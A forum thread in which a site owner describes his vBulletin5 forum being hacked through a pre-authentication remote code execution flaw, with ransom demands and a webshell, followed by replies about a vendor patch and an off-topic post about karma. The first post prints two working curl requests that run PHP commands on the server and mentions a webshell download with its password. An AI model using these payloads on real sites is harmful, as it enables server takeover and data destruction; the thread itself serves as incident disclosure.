Announcement

Collapse
No announcement yet.

[CRITICAL] A new vBulletin5 pre-auth zero-day RCE exploit has been released.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [CRITICAL] A new vBulletin5 pre-auth zero-day RCE exploit has been released.

    I was solving a wargame quest(CTF), but someone hacked the "powerhacker.net" site.
    So I started responding to hacking in real time and started monitoring their techniques.
    And it was immediately apparent that the technique he used was a
    zero-day that was unveiled three hours ago.
    It was exactly a
    zero-day exploit released on August 9th, 2020.
    Is it
    Black-Hat conference now?
    Looking at the date, I suspect that it was released by
    Black-Hat conference.
    Attackers deleted my site's database and requested bitcoin.
    If I were you I wouldn't have stopped the site.
    So you were immediately found.


    [Description of technical words for Koreans]
    pre-auth는 사전인증이 아니라 인증하지 않고라는 의미임.
    preauth앞에 오기 때문에 인증에 앞선다는 의미로 사용되는 것으로 보입니다.
    간단히 한국식으로 해석하면
    로그인 없이 통하는 취약점이라는 의미로 사용된다고 보심 될 것 같습니다.
    한국식으로 읽으면 완전히 정반대 의미가 되기 때문에 설명을 달았습니다.


    [Reference]

    This link and PPT is a technical article from the hacker who published zero-day.
    https://blog.exploitee.rs/
    Download: vbulletin_Exploiting_vBulletin_5.6.2_A_Tale_of_a_P atch_Fail.zip
    This vulnerability has been repeated in the past, but since it wasn't patched properly, zero-day came back.

    Click image for larger version  Name:	mysql_hacking.png Views:	0 Size:	636.9 KB ID:	619

    I didn't have the money, so I stopped the
    Amazon AWS EC2 web server a week ago and migrated it to my home server.
    The hacked website was running on a docker on a server running at home.
    The server at home was broken, I checked it, and it got hacked, so the hackers asked me for bitcoins.
    I decided to abandon the restore and restart the
    Amazon AWS EC2 web server.
    As soon as it was turned on, the hack came in again.

    I checked WebShell about 3-5 minutes after the attack started and immediately deleted it.
    They called themselves
    SilentAngel.
    (
    The password for the webshell is "silentangel.gov".
    Download:
    webshell.zip
    Are there any reasons government hackers should hack me?
    I'm a beggar right now.
    I don't even have the money to run an Amazon AWS EC2 server.)
    They seem to be proud of themselves.
    This vulnerability looks very dangerous.
    Be careful with everyone.
    It's surprising that there are hackers these days threatening online beggars and asking for bitcoins.

    Click image for larger version  Name:	zeroday-3.png Views:	0 Size:	609.5 KB ID:	620


    Click image for larger version  Name:	zeroday-1.png Views:	0 Size:	173.4 KB ID:	618

    Code:
    curl -s https://powerhacker.net/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();'
    curl -s https://powerhacker.net/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=passthru("ls");'

    This is the current vBulletin5 maker's forum site.
    They just closed the door.


    Click image for larger version  Name:	mysql_hacking3.png Views:	0 Size:	942.6 KB ID:	621

    P.S:
    Thanks for hacking this "powerhacker.net" site.
    Thanks to you, I can write security research article.
    Thank you for motivating me to write one more security article.
    I am lazy and cannot respond quickly to these security issues.
    Because of this site hacking, I came into contact with the security issue faster than others.

    Thanks for hacking.
    Attached Files

  • #2
    A security patch was released an hour ago by the vBulletin5 manufacturer.

    Click image for larger version

Name:	security_patch.png
Views:	104
Size:	343.5 KB
ID:	625

    Comment


    • #3
      Warn you! no hacked haha.

      Comment


      • #4
        I always imagine dating a lovely charming female hacker who hacks into my pants like a movie.
        However, in reality, it is difficult to see a woman once a year.

        So I pledged.

        If I have to be reborn as a human in the next world after I die, I have to build up good deeds now.
        I completely got rid of my karma.
        For 14 years, I deliberately chose suffering, and all my karma was cleansed.
        Karma for this life is the report card for the next life.
        It is called the report card "
        Sa-Ju-Pal-Ja (Western constellation destiny)".
        I can be reborn with that report card.

        I now fully understand that this world is virtual reality.
        According to the legendary myth of the goddess
        Isis, this reality is hell.
        There is a scene where the goddess Isis asks her father when She comes down to hell.
        Goddess Isis said, "
        If I enter hell, I can never come out alone. Send a signal to my dad and he will save me.".
        the only way out of this system is "
        Death".
        When we call our father, we call him "
        Dad".
        But it is wrong.
        The correct pronunciation is "
        Death".

        There are many interesting stories that are useless to me.
        It's like a useless sound of a dog barking.
        But it is fun to hear it.

        Hacking a site run by a dog like me means that the person behaves like a dog.
        Hacking this site only spreads dirty germs like coronavirus all over the world.

        Comment


        • #5
          This test i yet. but you show it to me on this topic.

          Comment


          • #6
            thanks for this thread.....

            Comment

            Working...
            X